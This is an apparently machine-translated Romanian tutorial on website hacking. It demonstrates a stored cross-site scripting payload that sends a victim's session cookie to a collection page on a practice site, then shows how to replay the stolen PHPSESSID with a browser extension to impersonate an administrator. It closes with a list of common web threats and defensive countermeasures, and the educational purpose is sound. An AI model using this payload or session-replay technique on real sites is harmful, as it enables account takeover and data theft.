Cum să piratezi un site web? Tehnici de piratare a site-urilor
⚡ Rezumat inteligent
Hacking-ul site-urilor web exploatează punctele slabe ale aplicațiilor web - cod scris prost, date de intrare nesanitare și gestionarea slabă a sesiunilor - pentru a obține acces neautorizat. Această pagină demonstrează tehnici comune de atac și, mai important, contramăsurile care mențin un site web în siguranță.

Mai mulți oameni au acces la internet decât oricând. Acest lucru a determinat multe organizații să dezvolte aplicații bazate pe web pe care utilizatorii le pot folosi online pentru a interacționa cu organizația. Codul scris prost pentru aplicațiile web poate fi exploatat pentru a obține acces neautorizat la date sensibile și servere web.
Vei învăța tehnici comune de hacking al site-urilor web și contramăsurile care te protejează împotriva unor astfel de atacuri.
Cum să piratezi un site web
În acest scenariu practic de hacking de site-uri web, vom deturna sesiunea de utilizator a aplicației web situată la www.techpanda.orgVom folosi scripting cross-site pentru a citi ID-ul sesiunii cookie, apoi îl vom folosi pentru a da o personificare a unei sesiuni de utilizator legitime.
Presupunerea este că atacatorul are acces la aplicația web și dorește să deturneze sesiunile altor utilizatori care utilizează aceeași aplicație. Scopul acestui atac ar putea fi obținerea accesului de administrator la aplicația web, presupunând că contul de acces al atacatorului este unul limitat.
Pasul 1) Deschideți URL http://www.techpanda.org/.
Pentru practică, se recomandă insistent obținerea accesului folosind SQL Injection. Consultați acest articol despre injecția SQL pentru mai multe informații despre cum să faci asta.
Pasul 2) Introduceți detaliile de conectare.
Adresa de e-mail pentru conectare este admin@google.com, iar parola este Password2010.
Pasul 3) Verificați tabloul de bord.
Dacă v-ați conectat cu succes, veți primi următorul tablou de bord.
Pasul 4) Introduceți conținut nou.
Faceți clic pe Adăugare contact nou și introduceți următoarele ca prenume:
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Pasul 5) Adăugați JavaScenariul.
Codul de mai sus folosește JavaScript. Adaugă un hyperlink cu un eveniment onclick. Când utilizatorul neatent dă clic pe link, evenimentul preia ID-ul sesiunii cookie PHP și îl trimite către pagina snatch_sess_id.php împreună cu ID-ul sesiunii din URL.
Pasul 6) Adăugați detalii.
Introduceți restul detaliilor așa cum se arată mai jos și faceți clic pe Salvare modificări.
Pasul 7) Verificați tabloul de bord.
Tabloul de bord va arăta acum ca următorul ecran.
Pasul 8) Verificați ID-ul sesiunii.
Deoarece scriptul cross-site este stocat în baza de date, acesta se încarcă de fiecare dată când utilizatorii cu drepturi de acces se conectează. Când administratorul se conectează și dă clic pe hyperlinkul „Închis”, primește o fereastră cu ID-ul sesiunii afișat în URL.
Notă: scriptul ar putea trimite valoarea către un server la distanță unde este stocat PHPSESSID-ul, apoi redirecționa utilizatorul înapoi ca și cum nimic nu s-ar fi întâmplat.
Notă: valoarea pe care o obțineți poate fi diferită de cea afișată aici, dar conceptul este același.
Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data
Notă: extensia clasică Tamper Data prezentată mai jos nu se mai instalează pe dispozitivul curent Firefox, dar conceptul pe care îl ilustrează — interceptarea și modificarea unei cereri HTTP pentru a reda o sesiune capturată — rămâne neschimbat.
Diagrama de mai jos arată pașii pe care trebuie să îi parcurgeți pentru a finaliza acest exercițiu.
- Veți avea nevoie de Firefox browser web pentru această secțiune și extensia Tamper Data.
- Operatii Deschise Firefox și instalați extensia așa cum se arată în diagramele de mai jos.
- Căutați date de manipulare, apoi faceți clic pe instalare, așa cum se arată mai sus.
- Faceți clic pe Accept și Instalați...
- Faceți clic pe Reporniți acum când instalarea este finalizată.
- Activați bara de meniu în Firefox dacă nu este afișat.
- Faceți clic pe meniul Instrumente, apoi selectați Date anti-manipulare, așa cum se arată mai jos.
- Veți primi următoarea fereastră. Notă: Dacă fereastra nu este goală, apăsați butonul de ștergere.
- Faceți clic pe meniul Pornire manipulare.
- Treceți înapoi la Firefox browser web, tastați http://www.techpanda.org/dashboard.php, apoi apăsați tasta Enter pentru a încărca pagina.
- Veți primi următoarea fereastră pop-up de la Tamper Data.
- Fereastra pop-up are trei (3) opțiuni. Opțiunea Tamper vă permite să modificați informațiile din antetul HTTP înainte ca acestea să fie trimise serverului.
- Apasa pe el.
- Veți obține următoarea fereastră.
- Copiați ID-ul sesiunii PHP pe care l-ați copiat din atac URL și lipiți-o după semnul egal. Valoarea dvs. ar trebui să arate acum astfel.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Faceți clic pe butonul OK.
- Veți primi din nou fereastra pop-up Date manipulare.
- Debifați caseta de selectare care întreabă Continuați manipularea?
- Faceți clic pe butonul Trimite când ați terminat.
- Ar trebui să puteți vedea tabloul de bord așa cum se arată mai jos.
Notă: nu ne-am autentificat; am impersonat o sesiune de autentificare folosind valoarea PHPSESSID pe care am recuperat-o prin cross-site scripting.
Ce este o aplicație web? Ce sunt amenințările web?
O aplicație web (aka website) este o aplicație bazată pe modelul client-server. Serverul oferă accesul la baza de date și logica de afaceri. Este găzduit pe un server web. Aplicația client rulează pe browserul web client. Aplicațiile web sunt de obicei scrise în limbi precum Java, C#, VB.Net, PHPși ColdFusion Markup Language etc. Motoarele de baze de date utilizate în aplicațiile web includ MySQL, MS SQL Server, PostgreSQL, SQLite, Etc
Top tehnici de hacking site-uri
Majoritatea aplicațiilor web sunt găzduite pe rețele publice servere accesibile prin internet. Acest lucru le face vulnerabile la atacuri datorită accesibilității ușoare. Următoarele sunt amenințări comune la adresa aplicațiilor web.
- Injecție SQL – scopul acestei amenințări ar putea fi ocolirea algoritmilor de conectare, sabotarea datelor etc.
- Denial of Service Atacuri – scopul acestei amenințări ar putea fi acela de a împiedica utilizatorii legitimi să acceseze resursa.
- Scripturi încrucișate (XSS) – scopul acestei amenințări ar putea fi injectarea de cod care poate fi executat în browserul client-side.
- Intoxicare prin cookie/sesiune – scopul acestei amenințări este de a modifica cookie-urile/datele de sesiune de către un atacator pentru a obține acces neautorizat.
- Modificarea formularelor – scopul acestei amenințări este modificarea datelor din formular, cum ar fi prețurile în aplicațiile de comerț electronic, astfel încât atacatorul să poată obține articole la prețuri reduse.
- Code Injecție – scopul acestei amenințări este de a injecta cod precum PHP, Python, etc. care pot fi executate pe server. Codul poate instala uși din spate, poate dezvălui informații sensibile etc.
- Desfigurare – scopul acestei amenințări este de a modifica pagina afișată pe un site web și de a redirecționa toate solicitările de pagină către o singură pagină care conține mesajul atacatorului.
Cum să vă protejați site-ul împotriva hackurilor?
O organizație poate adopta următoarea politică pentru a se proteja împotriva atacurilor pe serverele web.
- Injecție SQL – curățarea și validarea parametrilor utilizatorului înainte de trimiterea lor în baza de date pentru procesare poate ajuta la reducerea șanselor de a fi atacat prin SQL Injection. Motoarele de baze de date precum MS SQL Server, MySQL, etc. acceptă parametri și instrucțiuni pregătite. Sunt mult mai sigure decât instrucțiunile SQL tradiționale.
- Atacuri de negare a serviciului – firewall-urile pot fi utilizate pentru a bloca traficul de la adrese IP suspecte dacă atacul este un simplu DoS. Configurarea corectă a rețelelor și un sistem de detectare a intruziunilor pot, de asemenea, ajuta la reducerea șanselor de succes ale unui atac DoS.
- Scripting pe mai multe site-uri – validarea și igienizarea antetelor, parametrilor transmiși prin intermediul URL, parametrii formularului și valorile ascunse pot ajuta la reducerea atacurilor XSS.
- Intoxicare prin cookie/sesiune – acest lucru poate fi prevenit prin criptarea conținutului cookie-urilor, expirarea cookie-urilor după un anumit timp și asocierea cookie-urilor cu adresa IP a clientului care a fost utilizată pentru a le crea.
- Modificarea formularelor – acest lucru poate fi prevenit prin validarea și verificarea datelor introduse de utilizator înainte de procesarea acestora.
- Code Injecție – acest lucru poate fi prevenit prin tratarea tuturor parametrilor ca date, mai degrabă decât ca cod executabil. Pentru implementarea acestui lucru se pot utiliza igienizarea și validarea.
- Desfigurare – un bun securitatea aplicațiilor web Politica ar trebui să asigure că sigilează vulnerabilitățile utilizate în mod obișnuit pentru accesarea serverului web. Aceasta poate fi o configurație corectă a sistemului de operare, a software-ului serverului web și cele mai bune practici de securitate la dezvoltarea unui sistem.ping aplicatii web.
Verifica acest lucru: 9 Cel mai bun URL Scanere pentru a verifica dacă un link este sigur împotriva programelor malware


















